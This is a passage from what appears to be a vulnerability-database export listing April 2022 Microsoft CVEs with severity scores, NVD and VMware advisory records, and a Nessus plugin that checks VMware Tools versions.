[CVE-2022-26802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26802>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26803>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26919>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.1 | Yes
[CVE-2022-26831](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26831>) | Windows LDAP Denial of Service Vulnerability | No | No | 7.5 | No
[CVE-2022-24544](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24544>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-24530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24530>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-24499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24499>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26903>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2022-26810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26810>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-26827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26827>) | Windows File Server Resource Management Service Elevation of Privilege Vulnerability | No | No | 7 | Yes
[CVE-2022-26916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26916>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2022-26917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26917>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2022-26918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26918>) | Windows Fax Compose Form Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2022-24527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24527>) | Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes
[CVE-2022-26812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26812>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2022-26813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26813>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2022-24536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24536>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2022-26815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26815>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2022-26819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26819>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes
[CVE-2022-26820](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26820>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes
[CVE-2022-26821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26821>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes
[CVE-2022-26822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26822>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes
[CVE-2022-26829](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26829>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 6.6 | Yes
[CVE-2022-24521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Yes | No | 7.8 | No
[CVE-2022-24481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24481>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-24494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24494>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2022-24540](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24540>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes
[CVE-2022-21983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21983>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes
[CVE-2022-24534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24534>) | Win32 Stream Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes
[CVE-2022-24485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24485>) | Win32 File Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes
[CVE-2022-26809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26809>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2022-24528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24528>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2022-24492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24492>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2022-24533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24533>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8 | Yes
[CVE-2022-24493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24493>) | Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability | No | No | 5.5 | Yes
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:48:11", "type": "rapid7blog", "title": "Patch Tuesday - April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1125", "CVE-2022-1127", "CVE-2022-1128", "CVE-2022-1129", "CVE-2022-1130", "CVE-2022-1131", "CVE-2022-1133", "CVE-2022-1134", "CVE-2022-1135", "CVE-2022-1136", "CVE-2022-1137", "CVE-2022-1138", "CVE-2022-1139", "CVE-2022-1143", "CVE-2022-1145", "CVE-2022-1146", "CVE-2022-1232", "CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-23268", "CVE-2022-23292", "CVE-2022-24472", "CVE-2022-24473", "CVE-2022-24474", "CVE-2022-24475", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24513", "CVE-2022-24521", "CVE-2022-24523", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24532", "CVE-2022-24533", 
"CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24543", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24548", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-24765", "CVE-2022-24767", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26891", "CVE-2022-26894", "CVE-2022-26895", "CVE-2022-26896", "CVE-2022-26897", "CVE-2022-26898", "CVE-2022-26900", "CVE-2022-26901", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26907", "CVE-2022-26908", "CVE-2022-26909", "CVE-2022-26910", "CVE-2022-26911", "CVE-2022-26912", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920", "CVE-2022-26921", "CVE-2022-26924"], "modified": "2022-04-12T18:48:11", "id": "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "href": "https://blog.rapid7.com/2022/04/12/patch-tuesday-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-06-09T17:35:11", "description": "VMware Tools for Windows(12.0.0, 11.x.y and 10.x.y) contains an XML External Entity (XXE) vulnerability. 
A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware Tools is installed, may exploit this issue leading to a denial-of-service condition or unintended information disclosure.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-24T19:15:00", "type": "cve", "title": "CVE-2022-22977", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977"], "modified": "2022-06-09T15:52:00", "cpe": ["cpe:/a:vmware:tools:10.3.24", "cpe:/a:vmware:tools:11.3.5"], "id": "CVE-2022-22977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22977", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:vmware:tools:11.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:tools:10.3.24:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-26T20:50:40", "description": "Zoho ManageEngine ADSelfService Plus before build 6122 allows a remote authenticated administrator to execute arbitrary operating OS commands as SYSTEM via the policy custom script feature. 
Due to the use of a default administrator password, attackers may be able to abuse this functionality with minimal effort. Additionally, a remote and partially authenticated attacker may be able to inject arbitrary commands into the custom script due to an unsanitized password field.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-18T13:15:00", "type": "cve", "title": "CVE-2022-28810", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-26T18:07:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1"], "id": "CVE-2022-28810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28810", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6120:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6111:*:*:*:*:*:*"]}, {"lastseen": "2022-04-21T22:44:00", "description": "Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24527", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527"], "modified": "2022-04-21T20:49:00", "cpe": ["cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-24527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24527", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-03T20:33:39", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T14:15:00", "type": "cve", "title": "CVE-2022-30525", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T18:15:00", "cpe": ["cpe:/o:zyxel:usg_flex_500_firmware:5.30"], "id": "CVE-2022-30525", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:usg_flex_500_firmware:5.30:*:*:*:*:*:*:*"]}], "vmware": [{"lastseen": "2022-06-09T18:06:39", "description": "3\\. XML External Entity (XXE) vulnerability (CVE-2022-22977) \n\nVMware Tools for Windows contains an XML External Entity (XXE) vulnerability. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.8.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-24T00:00:00", "type": "vmware", "title": "VMware Tools for Windows update addresses an XML External Entity (XXE) vulnerability (CVE-2022-22977)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977"], "modified": "2022-05-24T00:00:00", "id": "VMSA-2022-0015", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0015.html", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}], "nessus": [{"lastseen": "2022-06-15T17:02:26", "description": "The version of VMware Tools installed on the remote Windows host is affected by an XML External Entity (XXE) vulnerability. 
A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware Tools is installed, may exploit this issue leading to a denial-of-service condition or unintended information disclosure.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H"}, "published": "2022-05-27T00:00:00", "type": "nessus", "title": "VMware Tools 10.x / 11.x / 12.x < 12.0.5 XXE (VMSA-2022-0015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22977"], "modified": "2022-06-10T00:00:00", "cpe": ["cpe:/a:vmware:tools"], "id": "VMWARE_TOOLS_WIN_VMSA-2022-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/161605", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161605);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/10\");\n\n script_cve_id(\"CVE-2022-22977\");\n script_xref(name:\"VMSA\", value:\"VMSA-2022-0015\");\n script_xref(name:\"IAVB\", value:\"2022-B-0014\");\n\n script_name(english:\"VMware Tools 10.x / 11.x / 12.x < 12.0.5 XXE (VMSA-2022-0015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization tool suite is installed on the remote Windows host is affected by an XML External Entity\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Tools installed on the remote Windows host is affected by an XML External Entity (XXE)\nvulnerability. 
A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware\nTools is installed, may exploit this issue leading to a denial-of-service condition or unintended information\ndisclosure.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Tools version 12.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22977\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:tools\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_tools_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Tools\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nvar app_info = vcf::get_app_info(app:'VMware Tools', win_local:TRUE);\nvar constraints = [{ 'min_version' : '10.0', 'fixed_version' : '12.0.5' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_NOTE);\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-06-19T17:40:03", "description": "The remote Windows host is missing security update 5012632 or cumulative update 5012658. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917, CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983, \tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. 